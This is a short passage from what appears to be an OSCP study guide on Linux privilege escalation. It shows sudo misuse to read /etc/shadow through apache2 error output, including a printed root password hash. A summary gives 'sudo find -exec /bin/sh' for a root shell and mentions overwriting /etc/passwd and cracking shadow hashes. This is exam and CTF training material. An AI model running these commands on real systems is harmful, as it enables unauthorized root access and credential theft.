Shankar01081991/OSCP-Guide/Linux/Linux Privilege Escalation Examples.md

     $ sudo apache2 -f /etc/shadow
     Syntax error on line 1 of /etc/shadow:
     Invalid command 'root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
+---
+Summary
+sudo Privileges: If a user has sudo access to certain commands (like find, nano, or less), they might be able to escalate their privileges.

+Exploit via sudo: Using sudo find . -exec /bin/sh \; or exploiting misconfigurations with common binaries, an attacker could gain root access.

+Overwriting Critical Files: Be cautious when overwriting system files like /etc/passwd — it’s risky but useful for CTFs.

+Finding the Flag: Once you have root access, locate the flag and/or crack password hashes from /etc/shadow.
 </details>

 <details>